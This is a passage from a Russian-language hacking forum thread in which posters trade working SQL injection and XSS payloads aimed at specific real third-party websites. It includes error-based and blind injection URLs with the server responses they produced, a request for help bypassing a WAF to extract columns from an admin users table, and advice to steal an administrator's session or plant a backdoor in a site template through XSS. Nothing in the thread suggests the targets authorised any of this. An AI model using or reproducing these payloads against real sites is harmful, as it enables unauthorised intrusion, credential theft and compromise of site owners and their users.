вроде там достаточно информации. Code: http://xxx.com/cat/15?order=1+LIMIT+0+PROCEDURE+ANALYSE+(0,(SELECT+3+ORDER+BY+updatexml(1,concat(0x3A,version()),1)))--+&order_type=DESC
Error Number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DESC LIMIT 50' at line 5 SELECT * FROM (`items`) WHERE `category` = '10' AND `sold` = '0' ORDER BY `1` LIMIT 0 PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), `1)))--` DESC LIMIT 50
знак комментария обязательно должен быть с пробелом в конце. если хотите, чтобы вам помогли, скиньте ссылку
Есть сайт на VDS, на нем стал появлятся какой-то левый js-код в некоторых js-файлах. PHP-работал от того же юзера, что и на FTP, то есть имел полные права. Я удалил код, поискал шеллы - не нашел ничего, сменил пасс на ftp. Через несколько дней код снова появился. Обшарил все - шеллов не нашел, но были мои шеллы, я подумал что как-то через них может заливается чувак, сменил пассы на них, удалил код, права поменял, теперь php работает как nobody, на js-файлы теперь доступа нет. Через несколько дней снова код появился, я в ахуе. Проверяю логи apache - нет ничего подозрительного, проверяю логи панели vds - тоже ничего подозрительного. И что характерно, права на js-файл сменены на 777, то есть кто-то имеет доступ к аккаунту, что и ftp. Как это возможно? Как найти паразита?
Троян теоретически возможен. Но windows security essentials молчит, да и в автозагрузке ничего подозрительного.
Code: http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=5,1,%27(%27))*/+--+ TRUE http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=4,1,%27(%27))*/+--+ FALSE Извращенский вариант, но имеет право на жизнь // YaBtr: Regexp
http://www.amnh.org/ology/xCards/index.php?cardNumber=047'*updatexml(1,concat(0x3A,version()),1)*' Ну и в добавочку. http://www.amnh.org/ology/xCards/index.php?cardNumber=047"><h1>xss</h1>
Code: https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=1 - TRUE http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=1 - TRUE http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=0 - FALSE https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=0 - FALSE не могу waf обойти, есть варианты? PS Code: http://www.maesen.com/sexshop/video_web.php?video=(88886635)or+1=(SELECT+TOP+1+'id'+FROM+adminusuarios) с information_schema.tables вытащить имя колонок с таблицы adminusuarios не получается, при использовании "_" пишет нет такой директори
Сканировал с помощью акунетикса: /wp-content/plugins/gd-star-rating/ajax.php Нашел XSS, написано: asr.84391.0.7.1428069437.10.0.30.3.3.0'"()&%<ScRiPt >prompt(973439)</ScRiPt> Как его использовать? И даст ли это возможность доступа к бд ? Раскручивать sql немного умею, но здесь не знаю куда копать.
Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ.
в любой статье по XSS это рассматривается. рядом с этой темой в "важных" есть карта раздела. http://forum.antichat.ru/threads/20140/
Здравствуйте! Нужна помощь. Вот 2 прогона от sqlmap: #1 http://rghost.ru/private/6TmxNVXSQ/f4be5442215c6d4f07720fddf568e844 #2 http://rghost.ru/private/6qgdBCK4S/b05166809cf70ed629397c2789cc97c5 Что можно выцепить? Я просто с sqlmap 1 раз работаю... Обычно подставил ' и пошло дело... Не пошло - дальше ручками пытаемся... Решил попробовать софтину. Сначала немного был ошарашен количеством тестов (ручками вечность перебирать будешь=)),но результат как-то не очень оказался... (хотя,скорее всего,я что-то не так сделал)
посмотрели бы видео по теме, полно же в сети. касаемо логов: Code: all tested parameters appear to be not injectable почти последняя строка.
в том-то и дело,что не нашел. possible integer casting detected (e.g. "$userid=intval($_REQUEST['userid'])") at the back-end web application - ? Ладно,можно ссылку на подробный мануал(русский только),пожалуйста Вот опять: all tested parameters appear to be not injectable НО: target URL appears to be UNION injectable with 1 columns log: http://rghost.ru/private/6Mt4dGwZD/b50eaa2717166e2b581189961825c0dd
Так бывает, когда скуля раскручиваемая, но SQLMap не может придумать вектор в рамках своей неопытности. Такой случай только руками.